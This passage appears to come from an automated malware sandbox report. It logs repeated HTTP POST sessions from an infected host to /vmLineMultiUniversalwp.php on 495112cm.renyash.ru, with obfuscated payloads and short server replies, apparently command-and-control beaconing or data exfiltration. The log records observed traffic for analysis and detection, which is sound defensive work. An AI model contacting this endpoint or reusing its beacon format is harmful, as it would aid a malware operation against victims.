                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:04.170648098 CET | 1844 | OUT | Data Raw: 51 5a 5b 54 55 59 5a 54 5c 5b 52 58 57 5f 58 5b 58 50 5a 52 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[TUYZT\[RXW_X[XPZRRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)_+A4P1/^(?9Z5>0<#=*(/;_+#"=X++!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:04.267805099 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:04.449250937 CET | 955 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjjipuQkdYPF22aL%2FciyEMKhc3023fsenVY657RkN2SFvwEJ%2BbpYC1VXSzbp%2FOL6zR7ON678RqgLVkeDp2MuHmr46dQBslIHXWFOvxRhwRhUIA77x1XWp%2FQYp1XjyDY1QJDtXHgn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e516ee1436c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=1766&rtt_var=5384&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=70688&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 2e 33 09 36 3c 33 03 29 10 26 5f 25 33 20 58 3b 31 2f 5e 23 5a 3b 5f 38 54 25 10 24 23 20 5c 29 06 2c 13 20 56 3f 51 30 20 2a 5d 06 12 3b 02 28 02 3d 05 31 5d 2e 1e 28 21 21 1b 27 26 36 5f 24 2e 3f 5a 28 02 29 5a 32 3c 1b 56 29 59 29 02 3a 2a 09 19 38 3c 02 51 20 29 21 53 08 13 23 0f 25 0f 2b 52 3e 09 29 58 26 0d 32 03 30 3a 2b 1c 29 28 34 53 27 58 32 16 39 21 02 02 28 30 20 58 3a 10 38 5e 3f 07 3c 09 25 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+.36<3)&_%3 X;1/^#Z;_8T%$# \), V?Q0 *];(=1].(!!'&6_$.?Z()Z2<V)Y):*8<Q )!S#%+R>)X&20:+)(4S'X29!(0 X:8^?<%,"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          105 | 192.168.2.4 | 50113 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:03.899383068 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:04.248646021 CET | 2520 | OUT | Data Raw: 54 5a 5e 53 50 5b 5f 50 5c 5b 52 58 57 5b 58 5f 58 57 5a 5e 52 5d 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^SP[_P\[RXW[X_XWZ^R]Q]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.**?#+5&07*1Z6=2'.!-"V(,?7\7>9>+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:04.358613968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:04.535705090 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6ZlZGr3JiddSLJvRxw%2B319AyJGYRXNECY%2FQ4IiWYcf3IX7mzf1Uu%2BdKu0asSoZkdd0Bby7oahKtza3nLYOcLjMd2wXIcG5yxnA0doAnDHOq9snU8oPzYc2WRNRWHrGDtqdobglq"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e51fef34378-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4580&min_rtt=1664&rtt_var=6457&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58404&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          106 | 192.168.2.4 | 50114 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:04.660221100 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:05.014300108 CET | 2520 | OUT | Data Raw: 54 5b 5b 52 50 59 5a 52 5c 5b 52 58 57 58 58 5e 58 5d 5a 58 52 54 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[RPYZR\[RXWXX^X]ZXRTQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.):3C4& ;*&5=Y3.7V#-*P<3*%#"-=>+!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:05.123142958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:05.300973892 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0DjtsXsydv9Al3JrrJH1PTNIfJjykZBKTEkXyHpsZjVUdTIfaJfq2pTe43B6X6cPDKrRjsEQrhe7bD5wBwKENOU0RaCHgGelV5IlbxXQy6G4tLS0XiY7iRGBbT9OIwTfG00YT9A"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e56bfbc7ca0-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5058&min_rtt=1928&rtt_var=6984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=54128&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          107 | 192.168.2.4 | 50115 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:05.420993090 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:05.780014038 CET | 2520 | OUT | Data Raw: 51 5b 5e 50 55 5d 5f 54 5c 5b 52 58 57 5d 58 5d 58 53 5a 5d 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^PU]_T\[RXW]X]XSZ]RWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*7 ;!2#><*!)['.; >(<,*&;7)!Y#!Y,
                                                                                          Jan 4, 2025 11:09:05.885885954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:06.342497110 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6L4zF4HtmG4vaWz7Xe583HeltFiKg7TTIN2uap2H1bn9brw%2FOGuba6QK7O8DKB0lfYhdBD5Tj1Lzszt%2B8BIosJb3K5mDpvYPa26Mp%2FzW1alls%2FsXFZ%2BA5pxNtLrQaYlQk%2BGxlI1"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e5b7fa07ca6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1977&rtt_var=3917&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=99455&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:09:06.374130011 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6L4zF4HtmG4vaWz7Xe583HeltFiKg7TTIN2uap2H1bn9brw%2FOGuba6QK7O8DKB0lfYhdBD5Tj1Lzszt%2B8BIosJb3K5mDpvYPa26Mp%2FzW1alls%2FsXFZ%2BA5pxNtLrQaYlQk%2BGxlI1"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e5b7fa07ca6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1977&rtt_var=3917&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=99455&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          108 | 192.168.2.4 | 50116 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:06.471796989 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:06.826807022 CET | 2516 | OUT | Data Raw: 54 5e 5e 57 55 52 5a 57 5c 5b 52 58 57 5a 58 52 58 52 5a 59 52 51 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^WURZW\[RXWZXRXRZYRQQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*A 1V'3?X=!Y"%03V4+,/Y<".%)!Y#!Y,
                                                                                          Jan 4, 2025 11:09:06.925226927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:07.102653980 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03NTqa7M3pvn4jBdbL%2B3LvH8wlLsc1qpR0HejMJFrpI3xzIxwryiAU5nc%2BuFaWNbjogAy9iyNRg496bct2DV8Kw%2FYIsqdxwefWurjav17XCPchJpHCI3DEfsmB%2FvbeMbUAhbPS3S"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e61fb5a7d00-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4204&min_rtt=1952&rtt_var=5236&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=73109&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          109 | 192.168.2.4 | 50117 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:07.234160900 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:07.592473984 CET | 2516 | OUT | Data Raw: 51 5d 5e 50 55 5f 5f 51 5c 5b 52 58 57 5a 58 5e 58 55 5a 52 52 5d 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^PU__Q\[RXWZX^XUZRR]Q^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*) ^%P%3*9]5=9Y08 &<<;<'[49*!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:07.698348999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:07.878041029 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gnck1JWa9sVBX4SPQAcLK5WN%2BWWpzOnncEsZtigMsedTwdMSGtxD4oFbJTXEBIeQ%2BBQkLbaLupB40SMp0Hj4yCt3ngK%2FLIN9p88w2RuIxTMOyZHprgMLYQ3DPhodWmv9ByMl3jJw"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e66c8c70c78-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3150&min_rtt=1541&rtt_var=3797&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=101262&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          110 | 192.168.2.4 | 50118 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:08.006273031 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:08.358241081 CET | 2520 | OUT | Data Raw: 51 5b 5b 55 50 5e 5a 5d 5c 5b 52 58 57 5b 58 5a 58 5d 5a 5d 52 55 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[[UP^Z]\[RXW[XZX]Z]RUQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9 +"%3(*<!">>&>?S!>?'<# =:X)!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:08.451647043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:08.627876997 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAVyvOVbSbjtEOYXzWiEExX2aeW7aHOjgTyVYIx6BSal6XP6trwGQ6O4sT1Iuy6yLcufa0DnqddE%2Bbr%2BYG5ficJTHHqqRwBQsrsaptJ4WShuwjUlB8HohBYXx4qRT7h%2ByDJhUUZy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e6b8c4343c4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1682&rtt_var=654&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=868014&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          111 | 192.168.2.4 | 50119 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:08.749919891 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:09.108198881 CET | 2520 | OUT | Data Raw: 54 5c 5e 57 50 5e 5a 5c 5c 5b 52 58 57 5d 58 52 58 57 5a 5c 52 54 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^WP^Z\\[RXW]XRXWZ\RTQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*978=U&0#_>X5=!34?(( .1>;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:09.202251911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:09.380384922 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ci9lMEnfSCKTLiOZw2NLIWzXlbHI6F4yAgCxTEUv91jC0%2FT7Rcr8XFUZR5C8c2i%2BQ22QAOzbgwIj%2BL4AVHSYGalirijLtesBzQeIFDPiAqnztPyp0nVEK1bAuexrl1qkaX55OkEP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e703bfb0f5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=981842&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          112 | 192.168.2.4 | 50120 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:09.457957029 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          113 | 192.168.2.4 | 50121 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:09.554349899 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:09.905021906 CET | 2520 | OUT | Data Raw: 51 5a 5e 5e 55 53 5f 51 5c 5b 52 58 57 5e 58 59 58 5c 5a 53 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^^US_Q\[RXW^XYX\ZSRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.))0 (9&;=%Y5[3>#.>R+_(64 );!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:09.997996092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:10.255259991 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
